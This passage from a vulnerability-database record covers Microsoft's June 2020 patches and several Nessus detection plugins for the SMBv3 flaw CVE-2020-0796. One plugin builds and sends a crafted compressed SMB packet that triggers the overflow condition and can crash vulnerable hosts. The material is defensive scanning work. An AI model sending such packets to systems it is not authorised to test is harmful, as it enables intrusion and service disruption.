However, Microsoft has provided patches for both operating systems.\u201d\n\n## **VBScript**\n\nVarious critical remote code-execution flaws were discovered in VBScript, Microsoft\u2019s Active Scripting language that is modeled on Visual Basic ([CVE-2020-1214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1214>),[ CVE-2020-1215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1215>), [CVE-2020-1216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1216>), [CVE-2020-1230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1230>), [CVE-2020-1260](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1260>)). The flaws exist in the way that the VBScript engine handles objects in memory; an attacker could corrupt memory in such a way that allows them to execute arbitrary code in the context of the current user.\n\nIn a real-life attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website.\n\n\u201cAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user,\u201d said Microsoft. \u201cIf the current user is logged on with administrative-user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\u201d\n\n## **Other Critical Flaws**\n\nAlso of note is a critical flaw (CVE-2020-1299) that exists in [Microsoft Windows,](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) which could allow remote code-execution if a .LNK file is processed. 
An .LNK file is a shortcut or \u201clink.\u201d An attacker can embed a malicious .LNK in a removable drive or remote share, and then convince the victim to open the drive or share in Windows Explorer. Then, the malicious binary will execute the code. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user, according to Microsoft.\n\nThe update also addressed a Windows [critical RCE flaw](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>) (CVE-2020-1300) that exists when Microsoft Windows fails to properly handle cabinet files. To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver, according to Microsoft\u2019s update.\n\nAnother critical vulnerability (CVE-2020-1286) exists due to Windows Shell not properly validating file paths. An attacker could exploit the flaw by convincing a user to open a specially crafted file, and then would be able to run arbitrary code in the context of the user, [according to Microsoft\u2019s update](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1286>).\n\n\u201cIf the current user is logged on as an administrator, an attacker could take control of the affected system,\u201d said Microsoft. \u201cAn attacker could then install programs; view, change or delete data; or create new accounts with elevated privileges. 
Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges.\u201d\n\nA critical flaw ([CVE-2020-1181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1181>)) in [SharePoint server](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1181>) was also fixed, stemming from the server failing to properly identify and filter unsafe ASP.Net web controls. The flaw can be abused by an authenticated, remote user who invokes a specially crafted page on an affected version of Microsoft SharePoint Server, allowing them to execute code.\n\nMicrosoft also issued [updates addressing Windows 10, 8.1 and Windows Server versions](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200010>) affected by a critical, use-after-free [Adobe Flash Player](<https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/>) flaw ([CVE-2020-9633](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9633>)). According to Microsoft, \u201cIn a web-based attack scenario where the user is using Internet Explorer for the desktop, an attacker could host a specially crafted website that is designed to exploit any of these vulnerabilities through Internet Explorer and then convince a user to view the website.\u201d\n\nMeanwhile, Adobe earlier on Tuesday [released patches](<https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/>) for four critical flaws in Flash Player and in its Framemaker document processor as part of its regularly scheduled updates. 
The bugs, if exploited, could enable arbitrary code-execution.\n", "cvss3": {}, "published": "2020-06-09T19:28:54", "type": "threatpost", "title": "Microsoft June Patch Tuesday Fixes 129 Flaws in Largest-Ever Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-1181", "CVE-2020-1206", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1230", "CVE-2020-1260", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-9633"], "modified": "2020-06-09T19:28:54", "id": "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "href": "https://threatpost.com/microsoft-june-patch-tuesday-largest-ever-update/156430/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T15:07:52", "description": "A remote code execution vulnerability exists in Microsoft Server Message Block 3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed data packet. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.\n\nNote, the plugin checks if SMB 3.1.1 with compression is enabled. 
It does not currently verify the vulnerability itself.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/134421", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134421);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0028\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is using a vulnerable version of SMB.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Microsoft Server Message Block\n3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed\ndata packet. An unauthenticated, remote attacker can exploit this to bypass\nauthentication and execute arbitrary commands.\n\nNote, the plugin checks if SMB 3.1.1 with compression is enabled. It does not\ncurrently verify the vulnerability itself.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?736703d3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has provided additional details and guidance in the ADV200005 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/11\");\n\n 
script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_dialects_enabled.nasl\");\n script_require_keys(\"SMB/smb_dialect/3.1.1\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = kb_smb_transport();\n\nif (get_kb_item('SMB/smb_dialect/3.1.1/compression'))\n{\n report = 'Nessus was able to detect SMB 3.1.1 with compression enabled using a specially crafted packet.\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:11:06", "description": "A remote code execution vulnerability exists in Microsoft Server Message Block 3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed data packet. 
An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.\n\nNote that this plugin works only if it can connect to the IPC$ share anonymously using SMB dialect 3.1.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-02T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "MICROSOFT_SMB_CVE-2020-0796.NASL", "href": "https://www.tenable.com/plugins/nessus/135177", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135177);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"MSKB\", value:\"4551762\");\n script_xref(name:\"MSFT\", value:\"MS20-4551762\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", 
value:\"CEA-2020-0028\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is using a vulnerable version of SMB.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Microsoft Server Message Block\n3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed\ndata packet. An unauthenticated, remote attacker can exploit this to bypass\nauthentication and execute arbitrary commands.\n\nNote that this plugin works only if it can connect to the IPC$\nshare anonymously using SMB dialect 3.1.1.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?32926bb8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4551762.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_dialects_enabled.nasl\", \"os_fingerprint.nasl\", \"samba_detect.nasl\");\n script_require_keys(\"SMB/smb_dialect/3.1.1/compression\");\n script_exclude_keys(\"SMB/samba\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('agent.inc');\n\n##\n# Receive an SMB message starting with the header.\n#\n# @return SMB response message or NULL on error.\n##\nfunction my_smb2_recv()\n{\n local_var socket, timeout, length, trailer, ret, header;\n\n socket = session_get_socket ();\n timeout = session_get_timeout ();\n\n length = recv(socket:socket, length:4, min:4, timeout:timeout);\n if (strlen(length) != 4)\n return NULL;\n\n # Direct-TCP transport header: one zero byte followed by a 3-byte big-endian length.\n length = 65536 * ord(length[1]) +\n 256 * ord(length[2]) +\n ord(length[3]);\n\n if (length > 100000)\n length = 100000;\n\n trailer = recv(socket:socket, length:length, min:length, timeout:timeout);\n if (strlen(trailer) < length )\n return NULL;\n\n return trailer;\n}\n\n\n#\n# MAIN\n#\n\n# Exit if run on agent.\nif(agent()) exit(0,'This plugin is disabled on Nessus Agents.');\n\n# Exit if samba is detected.\nif (get_kb_item('SMB/samba') ) exit(0, 'SMB server is Samba.');\n\n# If OS is detected, exit if the OS is not Windows.\nos = get_kb_item('Host/OS');\nif (os && os !~ '[Ww]indows')\n audit(AUDIT_OS_NOT, 'Windows');\n\n# Exit if SMB v3.1.1 is not supported\nif(! 
get_kb_item('SMB/smb_dialect/3.1.1'))\n exit(0, 'SMB dialect 3.1.1 is not supported on the remote host.');\n\n# Exit if compression is not supported or enabled.\nif(! get_kb_item('SMB/smb_dialect/3.1.1/compression'))\n exit(0, 'SMB compression is not supported or enabled on the remote host.'); \n\n# Exit if LZNT1 compression is not supported or enabled.\nif(! get_kb_item('SMB/smb_dialect/3.1.1/compression/LZNT1'))\n exit(0, 'SMB compression algorithm LZNT1 is not supported or enabled on the remote host.');\n\nport = kb_smb_transport();\n\n# SMB transport port isn't open\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port);\n\nif (!smb_session_init(timeout:10)) audit(AUDIT_FN_FAIL, 'smb_session_init');\nsoc = session_get_socket();\n\nret = NetUseAdd(share:'IPC$');\nif(ret != 1)\n exit(0, 'Failed to connect to IPC$ anonymously using SMB v3.1.1.');\n\nLZNT1 = 1;\n# 0x800135 'A's compressed with LZNT1\norig_size = 0x800135;\n\ncompressed = NULL;\n# 0x800000 'A's\nfor (i = 0; i < 0x800; i++)\n compressed += '\\x03\\xb0\\x02\\x41\\xfc\\x0f'; # 0x1000 'A's\n\n# 0x135 'A's\ncompressed += '\\x03\\xb0\\x02\\x41\\x31\\x01';\n\n# Use TREE_CONNECT as the first message in a compound request to\n# avoid crash in srv2.sys versions prior to 10.0.18362.329.\npath = 'IPC$';\ncpath = cstring (string:\"\\\\\", _null:1) + cstring (string:session_get_hostname(), _null:1) + cstring (string:\"\\\", _null:1) + cstring (string:path, _null:1);\n\ndata = raw_word(w:9) + # StructureSize\n raw_word(w:0) + # Reserved\n raw_word(w:0x48) + # PathOffset\n raw_word(w:strlen(cpath)) + # PathLength\n cpath; # Buffer\n\n# Messages in a compound request are 8-byte aligned. 
\nif(strlen(data) % 8)\n data += crap(data:'\\x00', length: 8 - strlen(data)%8);\n\nmsg1 = smb2_header(command:3, status:STATUS_SUCCESS);\nmsg1 += null_signature;\nmsg1[20] = raw_string(0x40 + strlen(data));\nmsg1 += data;\n\n# The second message in the compound request is compressed such that\n#\n# (COMPRESSION_TRANSFORM_HEADER.offset +\n# COMPRESSION_TRANSFORM_HEADER.OriginalCompressedSegmentSize) > 0x800134\n#\n# Use QUERY_DIRECTORY so that the message is not subject to the 0x11000-byte\n# max msg_size limit.\ncommand = 0xE;\nheader = smb2_header(command:command, status:STATUS_SUCCESS);\nheader += null_signature;\n\nuncompressed = msg1 + header;\ncth = raw_dword(d:0x424D53FC)\n + raw_dword(d:orig_size) # OriginalCompressedSegmentSize\n + raw_word(w:LZNT1) # CompressionAlgorithm\n + raw_word(w:0) # flags\n + raw_dword(d:strlen(uncompressed)); # offset\n\npacket = cth + uncompressed + compressed;\n\nlength = strlen(packet);\nnetbios = netbios_header (type:0, length:length) + packet;\nsend (socket:soc, data:netbios);\nres = my_smb2_recv();\nNetUseDel();\n\n# The vulnerable server does not check\n# offset + OriginalCompressedSegmentSize <= 0x800134, the compound request\n# is processed and a compressed response is returned.\nif((strlen(res) > 16 && get_dword(blob:res, pos:0) == 0x424D53FC)\n # Should not happen; but in case TREE_CONNECT in the compound request\n # fails, crash on vulnerable srv2.sys version < 10.0.18362.329\n || !smb_session_init(timeout:10))\n{\n extra = 'Nessus was able to detect the vulnerability by sending a specially crafted message to the remote SMB server.';\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\n# The patched server checks\n# offset + OriginalCompressedSegmentSize <= 0x800134, and the check fails.\n# The server closes the connection without returning a response.\nelse\n audit(AUDIT_HOST_NOT, 'affected');\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2023-01-11T15:07:38", "description": "This plugin has been deprecated due to an out-of-band patch being released by the vendor. The suggested mitigation provided in ADV200005 is no longer required. Plugin 134428 should be used instead to verify the patch is properly applied.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_MICROSOFT_WINDOWS_ADV200005.NASL", "href": "https://www.tenable.com/plugins/nessus/134420", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2020/03/12. 
Deprecated by smb_nt_ms20_mar_4551762.nasl.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134420);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2020-0796\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Deprecated)\");\n script_summary(english:\"Checks the Windows version and mitigative measures.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin has been deprecated due to an out-of-band patch being released by\nthe vendor. The suggested mitigation provided in ADV200005 is no longer\nrequired. Plugin 134428 should be used instead to verify the patch is properly\napplied.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?736703d3\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/11\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/WindowsVersionBuild\");\n\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nexit(0,'This plugin has been deprecated. Use smb_nt_ms20_mar_4551762.nasl (plugin ID 134428) instead.');\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:09:04", "description": "The remote Windows host is missing security update 4551762. It is, therefore, affected by a remote code execution vulnerability. The vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "nessus", "title": "KB4551762: Windows 10 Version 1903 and Windows 10 Version 1909 OOB Security Update (ADV200005)(CVE-2020-0796)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-0796"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4551762.NASL", "href": "https://www.tenable.com/plugins/nessus/134428", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134428);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"MSKB\", value:\"4551762\");\n script_xref(name:\"MSFT\", value:\"MS20-4551762\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0028\");\n\n script_name(english:\"KB4551762: Windows 10 Version 1903 and Windows 10 Version 1909 OOB Security Update (ADV200005)(CVE-2020-0796)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4551762. It is, therefore, affected by a remote code execution\nvulnerability. The vulnerability exists in the way that the Microsoft Server Message Block 3.1.1\n(SMBv3) protocol handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the\nability to execute code on the target server or client.\");\n # https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ab6efe1b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4551762.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4551762');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, 